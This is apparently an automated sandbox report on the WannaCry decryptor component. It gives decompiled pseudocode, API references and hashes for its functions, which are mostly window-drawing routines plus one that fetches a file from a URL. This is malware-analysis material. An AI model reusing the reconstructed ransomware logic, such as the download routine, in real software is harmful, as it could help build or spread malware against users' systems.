                                  0x00409c37
                                  0x00409c3d
                                  0x00409c3d

                                  APIs
                                  • #3797.MFC42 ref: 00409C27
                                  • #6734.MFC42(?,?), ref: 00409C4E
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00409C68
                                  • #4284.MFC42(00004000,00000000,00000000,?,?), ref: 00409CCD
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #3797#4284#6734MessageSend
                                  • String ID:
                                  • API String ID: 1776784669-0
                                  • Opcode ID: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                  • Instruction ID: 0f06e6a1ab2a1e1858972f557de936d8f63d8015e647da1bd90f7003a846fc2f
                                  • Opcode Fuzzy Hash: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                  • Instruction Fuzzy Hash: 2F31B0727447019BE724DE28DD81B6B73E1ABC8700F10493EFA86A73C1DA78EC468759
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004127E0 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E004127E0(signed int __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v4;
				intOrPtr* _v16;
				intOrPtr _v24;
				void* __ebx;
				intOrPtr* _t21;
				intOrPtr* _t23;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t33;
				signed int _t42;
				unsigned int _t44;
				signed int _t45;
				void* _t53;
				intOrPtr _t65;
				void* _t67;
				intOrPtr _t68;
				void* _t69;

				_push(0xffffffff);
				_push(E0041438B);
				_t21 =  *[fs:0x0];
				_push(_t21);
				 *[fs:0x0] = _t68;
				_push(__ecx);
				_push(0x244);
				L00412CEC();
				_t33 = _t21;
				_t69 = _t68 + 4;
				_v16 = _t33;
				_t53 = 0;
				_v4 = 0;
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					_t65 = _a16;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x134)) = 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x138)) = 0;
					 *((intOrPtr*)(_t33 + 0x13c)) = 0;
					if(_t65 != 0) {
						asm("repne scasb");
						_t42 =  !(__ecx | 0xffffffff);
						_push(_t42);
						L00412CEC();
						 *((intOrPtr*)(_t33 + 0x138)) = 0;
						asm("repne scasb");
						_t44 =  !(_t42 | 0xffffffff);
						_t67 = _t65 - _t44;
						_t45 = _t44 >> 2;
						memcpy(_t67 + _t45 + _t45, _t67, memcpy(0, _t67, _t45 << 2) & 0x00000003);
						_t69 = _t69 + 0x1c;
						_t53 = 0;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_v4 = 0xffffffff;
				_t23 = E00411C00(_t33);
				 *0x4220dc = _t23;
				if(_t23 == _t53) {
					_push(8);
					L00412CEC();
					 *_t23 = 1;
					 *((intOrPtr*)(_t23 + 4)) = _t33;
					 *[fs:0x0] = _v24;
					return _t23;
				} else {
					if(_t33 != _t53) {
						_t25 =  *((intOrPtr*)(_t33 + 0x138));
						if(_t25 != _t53) {
							_push(_t25);
							L00412C98();
							_t69 = _t69 + 4;
						}
						_t26 =  *((intOrPtr*)(_t33 + 0x13c));
						 *((intOrPtr*)(_t33 + 0x138)) = _t53;
						if(_t26 != _t53) {
							_push(_t26);
							L00412C98();
							_t69 = _t69 + 4;
						}
						_push(_t33);
						 *((intOrPtr*)(_t33 + 0x13c)) = _t53;
						L00412C98();
						_t69 = _t69 + 4;
					}
					 *[fs:0x0] = _v24;
					return 0;
				}
			}




















                                  0x004127e0
                                  0x004127e2
                                  0x004127e7
                                  0x004127ed
                                  0x004127ee
                                  0x004127f5
                                  0x004127f8
                                  0x004127fd
                                  0x00412802
                                  0x00412804
                                  0x00412807
                                  0x0041280b
                                  0x0041280f
                                  0x00412813
                                  0x0041287d
                                  0x00412815
                                  0x00412816
                                  0x0041281c
                                  0x0041281e
                                  0x00412825
                                  0x0041282f
                                  0x00412835
                                  0x0041283b
                                  0x00412844
                                  0x00412846
                                  0x00412848
                                  0x00412849
                                  0x0041285a
                                  0x00412860
                                  0x00412862
                                  0x00412868
                                  0x0041286c
                                  0x00412876
                                  0x00412876
                                  0x00412878
                                  0x00412878
                                  0x0041287a
                                  0x0041288b
                                  0x0041288c
                                  0x0041288d
                                  0x00412890
                                  0x00412898
                                  0x0041289f
                                  0x004128a4
                                  0x004128f8
                                  0x004128fa
                                  0x00412906
                                  0x0041290c
                                  0x00412911
                                  0x0041291b
                                  0x004128a6
                                  0x004128a8
                                  0x004128aa
                                  0x004128b2
                                  0x004128b4
                                  0x004128b5
                                  0x004128ba
                                  0x004128ba
                                  0x004128bd
                                  0x004128c3
                                  0x004128cb
                                  0x004128cd
                                  0x004128ce
                                  0x004128d3
                                  0x004128d3
                                  0x004128d6
                                  0x004128d7
                                  0x004128dd
                                  0x004128e2
                                  0x004128e2
                                  0x004128ed
                                  0x004128f7
                                  0x004128f7

                                  APIs
                                  • #823.MFC42(00000244,?,00000428,?,?,0041438B,000000FF,00412933,?,00000000,00000002,?,0040B6CF,?,?), ref: 004127FD
                                  • #823.MFC42(?,?,?), ref: 00412849
                                  • #825.MFC42(?), ref: 004128B5
                                  • #825.MFC42(?), ref: 004128CE
                                  • #825.MFC42(00000000), ref: 004128DD
                                  • #823.MFC42(00000008), ref: 004128FA
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #823#825
                                  • String ID:
                                  • API String ID: 89657779-0
                                  • Opcode ID: a8225a914fe684002f5ebb33c6b5a83bf5030d8ce9238fcdcecfe8f5a0f25a9a
                                  • Instruction ID: dc1b5eec0fc78afcb49772100b5c76d6e8760601cde25cb5382a27e7a1041640
                                  • Opcode Fuzzy Hash: a8225a914fe684002f5ebb33c6b5a83bf5030d8ce9238fcdcecfe8f5a0f25a9a
                                  • Instruction Fuzzy Hash: 8631A5B16006008BDB149F2E8D8169BB6D5FBC4720F18473EF929CB3C1EBB99951C755
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B780 Relevance: 9.1, APIs: 6, Instructions: 68filenetworkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E0040B780(signed int __ecx, CHAR* _a4, char* _a8) {
				intOrPtr _v12;
				void _v259;
				char _v260;
				char _v264;
				char _v284;
				char _t15;
				int _t19;
				CHAR* _t25;
				signed int _t26;
				char* _t40;

				_t26 = __ecx;
				_t25 = _a4;
				CreateDirectoryA(_t25, 0);
				_t40 = _a8;
				asm("repne scasb");
				if( !(_t26 | 0xffffffff) == 1) {
					L4:
					return 0;
				} else {
					_t15 =  *0x421798; // 0x0
					_v260 = _t15;
					memset( &_v259, 0, 0x40 << 2);
					asm("stosw");
					asm("stosb");
					GetTempFileNameA(_t25, "t", 0,  &_v260);
					_t19 = DeleteUrlCacheEntry(_t40);
					_push(0);
					_push(0);
					_push( &_v264);
					_push(_t40);
					_push(0);
					L004133CE();
					if(_t19 != 0 || E0040B6A0(_t25,  &_v284, _v12) == 0) {
						DeleteFileA( &_v284);
						goto L4;
					} else {
						DeleteFileA( &_v284);
						return 1;
					}
				}
			}













                                  0x0040b780
                                  0x0040b787
                                  0x0040b793
                                  0x0040b799
                                  0x0040b7a7
                                  0x0040b7ac
                                  0x0040b81d
                                  0x0040b826
                                  0x0040b7ae
                                  0x0040b7ae
                                  0x0040b7b8
                                  0x0040b7c2
                                  0x0040b7c8
                                  0x0040b7d3
                                  0x0040b7d4
                                  0x0040b7db
                                  0x0040b7e1
                                  0x0040b7e7
                                  0x0040b7e9
                                  0x0040b7ea
                                  0x0040b7eb
                                  0x0040b7ed
                                  0x0040b7f4
                                  0x0040b815
                                  0x00000000
                                  0x0040b827
                                  0x0040b82c
                                  0x0040b83d
                                  0x0040b83d
                                  0x0040b7f4

                                  APIs
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,00000428), ref: 0040B793
                                  • GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                  • DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                  • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                  • DeleteFileA.KERNEL32(?), ref: 0040B815
                                  • DeleteFileA.KERNEL32(?), ref: 0040B82C
                                    • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,00000000,00000428), ref: 0040B6B4
                                    • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Delete$CreateDirectory$CacheDownloadEntryNameTemp
                                  • String ID:
                                  • API String ID: 361195595-0
                                  • Opcode ID: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                  • Instruction ID: f6bba9489874f0a6e7d9c3b0bbe4d647d3eb1ae806ee8fe5932772f512dcd3e1
                                  • Opcode Fuzzy Hash: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                  • Instruction Fuzzy Hash: 24112B76100300BBE7209B60DC85FEB379CEBC4321F00C82DF659921D1DB79550987EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409A40 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00409A40(signed int* _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr* _v24;
				struct tagRECT _v40;
				intOrPtr _v56;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v88;
				intOrPtr _t34;
				void* _t35;
				void* _t53;
				intOrPtr _t56;

				 *[fs:0x0] = _t56;
				_v40.right = 0;
				_v40.top = 0x41679c;
				_v4 = 0;
				E00409D40( &(_v40.bottom), _a4, _a8);
				OffsetRect( &_v40,  ~( *_a4),  ~(_a4[1]));
				L00412D5E();
				L00413010();
				_t34 =  *_v24;
				_t35 =  *((intOrPtr*)( *( *_a4) + 0x64))(0, 0, _t34,  *((intOrPtr*)(_t34 - 8)),  &_v68, CreateRectRgn(_v40, _v40.top, _v40.right, _v40.bottom), _t53,  *[fs:0x0], E00414220, 0xffffffff);
				L00412D52();
				_v88 = 0x415c00;
				_v56 = 1;
				L00412D52();
				 *[fs:0x0] = _v64;
				return _t35;
			}














                                  0x00409a4e
                                  0x00409a5d
                                  0x00409a65
                                  0x00409a73
                                  0x00409a82
                                  0x00409a9b
                                  0x00409ac0
                                  0x00409acc
                                  0x00409ad7
                                  0x00409ae4
                                  0x00409aeb
                                  0x00409af0
                                  0x00409afc
                                  0x00409b04
                                  0x00409b0e
                                  0x00409b18

                                  APIs
                                  • OffsetRect.USER32(?,?,?), ref: 00409A9B
                                  • CreateRectRgn.GDI32(?,?,?,?), ref: 00409AB5
                                  • #1641.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220), ref: 00409AC0
                                  • #5781.MFC42(0041679C,00000000), ref: 00409ACC
                                  • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409AEB
                                  • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409B04
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414Rect$#1641#5781CreateOffset
                                  • String ID:
                                  • API String ID: 2675356817-0
                                  • Opcode ID: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                  • Instruction ID: 08eaaa51a6c0e03944d0349f6c05153d0be232de021c7e29130ffbf32961e4dd
                                  • Opcode Fuzzy Hash: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                  • Instruction Fuzzy Hash: 7621E9B5204701AFD304DF14C995FABB7E8EB88B04F108A1DF58697291CB78EC45CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004034A0 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E004034A0(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413620);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0xe8)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}















                                  0x004034a0
                                  0x004034a2
                                  0x004034ad
                                  0x004034ae
                                  0x004034ba
                                  0x004034c6
                                  0x004034d6
                                  0x004034d7
                                  0x004034e0
                                  0x004034e4
                                  0x004034e7
                                  0x004034ef
                                  0x00403519
                                  0x0040351f
                                  0x00403524
                                  0x00403529
                                  0x00403535
                                  0x0040353d
                                  0x0040354b
                                  0x00403555

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#2414#283ClientRect
                                  • String ID:
                                  • API String ID: 3728838672-0
                                  • Opcode ID: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                  • Instruction ID: 278ac0b80a8d68711b6ced8a2ef72b48c78586c4dd5442d856e74ad00dc42751
                                  • Opcode Fuzzy Hash: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                  • Instruction Fuzzy Hash: DB113375204741AFC314DF69D985F9BB7E8FB88714F008A1EB55AD3280DB78E8448B55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406940 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E00406940(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413E30);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0x824)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}















                                  0x00406940
                                  0x00406942
                                  0x0040694d
                                  0x0040694e
                                  0x0040695a
                                  0x00406966
                                  0x00406976
                                  0x00406977
                                  0x00406980
                                  0x00406984
                                  0x00406987
                                  0x0040698f
                                  0x004069b9
                                  0x004069bf
                                  0x004069c4
                                  0x004069c9
                                  0x004069d5
                                  0x004069dd
                                  0x004069eb
                                  0x004069f5

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#2414#283ClientRect
                                  • String ID:
                                  • API String ID: 3728838672-0
                                  • Opcode ID: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                  • Instruction ID: 6a096d29dde81ab0807628e72033e91f5df492254ff76bbe7bc423a6b66a9ecc
                                  • Opcode Fuzzy Hash: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                  • Instruction Fuzzy Hash: CB113375204741AFC314DF69D985F9BB7E8FB8C714F008A1EB599D3280DB78D8058BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404EB0 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E00404EB0(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413870);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0x6c)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}















                                  0x00404eb0
                                  0x00404eb2
                                  0x00404ebd
                                  0x00404ebe
                                  0x00404eca
                                  0x00404ed6
                                  0x00404ee3
                                  0x00404ee4
                                  0x00404eed
                                  0x00404ef1
                                  0x00404ef4
                                  0x00404efc
                                  0x00404f26
                                  0x00404f2c
                                  0x00404f31
                                  0x00404f36
                                  0x00404f42
                                  0x00404f4a
                                  0x00404f58
                                  0x00404f62

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#2414#283ClientRect
                                  • String ID:
                                  • API String ID: 3728838672-0
                                  • Opcode ID: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                  • Instruction ID: d163b7983d6ef18c2c490a4321b6073019a727c2a72f1ecd8d9e2d5251008e6b
                                  • Opcode Fuzzy Hash: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                  • Instruction Fuzzy Hash: CB113375204701AFC314DF69D985F9BB7E8FB88714F008A1EB599D3280DB78D8058B55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404310 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E00404310(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v40;
				intOrPtr _v48;
				void* _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				intOrPtr _v112;
				void* _v128;
				void* _v132;
				void* _t20;
				void* _t22;
				void* _t39;
				intOrPtr _t40;
				intOrPtr _t42;

				_push(0xffffffff);
				_push(E004137A8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t42;
				_t39 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					E004044C0(__ecx, 0);
				}
				L00412DD0();
				_t20 = _t39 + 0x48;
				_v8 = 0;
				L00412DCA();
				L00412DC4();
				L00412DBE();
				_t40 =  *((intOrPtr*)(_t39 + 0x40));
				_t22 =  *((intOrPtr*)(_v112 + 0x64))(0, 0, _t40,  *((intOrPtr*)(_t40 - 8)),  *((intOrPtr*)(_t39 + 0x64)), 1, _t20, _t39);
				_push(_t20);
				L00412DCA();
				_v40 = 0xffffffff;
				L00412DB8();
				 *[fs:0x0] = _v48;
				return _t22;
			}


















                                  0x00404316
                                  0x00404318
                                  0x0040431d
                                  0x0040431e
                                  0x00404329
                                  0x00404331
                                  0x00404335
                                  0x00404335
                                  0x0040433f
                                  0x00404344
                                  0x0040434c
                                  0x00404354
                                  0x00404361
                                  0x0040436e
                                  0x00404373
                                  0x00404387
                                  0x0040438a
                                  0x0040438f
                                  0x00404398
                                  0x004043a0
                                  0x004043ab
                                  0x004043b5

                                  APIs
                                  • #470.MFC42(?,00000000), ref: 0040433F
                                  • #5789.MFC42 ref: 00404354
                                  • #5875.MFC42(00000001), ref: 00404361
                                  • #6172.MFC42(?,00000001), ref: 0040436E
                                  • #5789.MFC42(00000000), ref: 0040438F
                                  • #755.MFC42(00000000), ref: 004043A0
                                    • Part of subcall function 004044C0: GetParent.USER32(?), ref: 004044D2
                                    • Part of subcall function 004044C0: #2864.MFC42(00000000), ref: 004044D9
                                    • Part of subcall function 004044C0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                    • Part of subcall function 004044C0: #2860.MFC42(00000000), ref: 004044EF
                                    • Part of subcall function 004044C0: GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                    • Part of subcall function 004044C0: CreateFontIndirectA.GDI32(?), ref: 00404513
                                    • Part of subcall function 004044C0: #1641.MFC42(00000000), ref: 0040451D
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#1641#2860#2864#470#5875#6172#755CreateFontIndirectMessageObjectParentSend
                                  • String ID:
                                  • API String ID: 3301245081-0
                                  • Opcode ID: fc0b145fd5a230e1fb0a5d7e30a8fbc0e65b4b60cc0ead88fd739261a0b8085f
                                  • Instruction ID: 67bcf298962d36d7fa18f20cd84a87d7b1dd540c5c31f1d51ecab4020f7c2e08
                                  • Opcode Fuzzy Hash: fc0b145fd5a230e1fb0a5d7e30a8fbc0e65b4b60cc0ead88fd739261a0b8085f
                                  • Instruction Fuzzy Hash: 4611CE71104300AFC310EF14D841FDAB7A4EF94724F008A1EF5A6932D0CBB8A484CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403EB0 Relevance: 9.0, APIs: 6, Instructions: 24COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 46%
                                  			E00403EB0(void* __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr _t9;

				_t9 = _a4;
				_push(_t9);
				_push(0x407);
				L00412CE6();
				L00412D88();
				_push(_t9);
				_push(0x408);
				L00412CE6();
				L00412D88();
				_push(_t9);
				_push(2);
				L00412CE6();
				L00412D88();
				return __eax;
			}




                                  0x00403eb2
                                  0x00403eb8
                                  0x00403eb9
                                  0x00403ebe
                                  0x00403ec5
                                  0x00403eca
                                  0x00403ecb
                                  0x00403ed2
                                  0x00403ed9
                                  0x00403ede
                                  0x00403edf
                                  0x00403ee3
                                  0x00403eea
                                  0x00403ef1

                                  APIs
                                  • #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                  • #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                  • #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                  • #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                  • #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                  • #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
